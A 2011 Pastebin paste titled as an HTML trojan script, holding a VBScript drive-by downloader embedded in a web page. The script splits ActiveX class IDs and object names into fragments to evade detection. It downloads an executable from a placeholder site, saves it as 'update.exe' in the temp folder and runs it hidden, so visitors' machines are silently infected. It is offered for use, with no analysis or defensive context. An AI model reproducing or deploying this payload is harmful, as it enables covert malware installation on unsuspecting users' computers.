Advertisement
Guest User

HTML Script For Trojan bY BLACK BURN

a guest
Dec 11th, 2011
185
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.05 KB | None | 0 0
  1. <HTML>
  2. <BODY>
  3. <script language="VBScript">
  4. on error resume next
  5. dl = "www.yoursite.com/trojan.exe"
  6. Set df = document.createElement("object")
  7. cls1="clsid:BD96"
  8. cls2="C556-65A"
  9. cls3="3-11D0-9"
  10. cls4="83A-00C04FC29E36"
  11. clsfull=cls1&cls2&cls3&cls4
  12. df.setAttribute "classid",clsfull
  13. strr1="Mic"
  14. strr2="roso"
  15. strr3="ft."
  16. strr4="XML"
  17. strr5="HTTP"
  18. strr=strr1&strr2&strr3&strr4&strr5
  19. Set x = df.CreateObject(strr,"")
  20. ab1="A"
  21. ab2="dod"
  22. ab3="b.S"
  23. ab4="t"
  24. ab5="re"
  25. ab6="am"
  26. strb1=ab1&ab2&ab3&ab4&ab5&ab6
  27. strb5=strb1
  28. set YY = df.createobject(strb5,"")
  29. YY.type = 1
  30. str6="GET"
  31. x.Open str6, dl, False
  32. x.Send
  33. fnamezz1="update.exe"
  34. scripp1="Scrip"
  35. scripp2="ting"
  36. scripp3=".Fil"
  37. scripp4="eSyste"
  38. scripp5="mObject"
  39. scripp=scripp1&scripp2&scripp3&scripp4&scripp5
  40. set FF = df.createobject(scripp,"")
  41. set tmp = F.GetSpecialFolder(2)
  42. fnamezz1= FF.BuildPath(tmp,fnamezz1)
  43. YY.open
  44. YY.write x.responseBody
  45. YY.savetofile fnamezz1,2
  46. YY.close
  47. set MM = df.createobject("Shell.Application","")
  48. MM.ShellExecute fnamezz1,"","","open",0
  49. </script>
  50. </BODY>
  51. </HTML>
  52.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement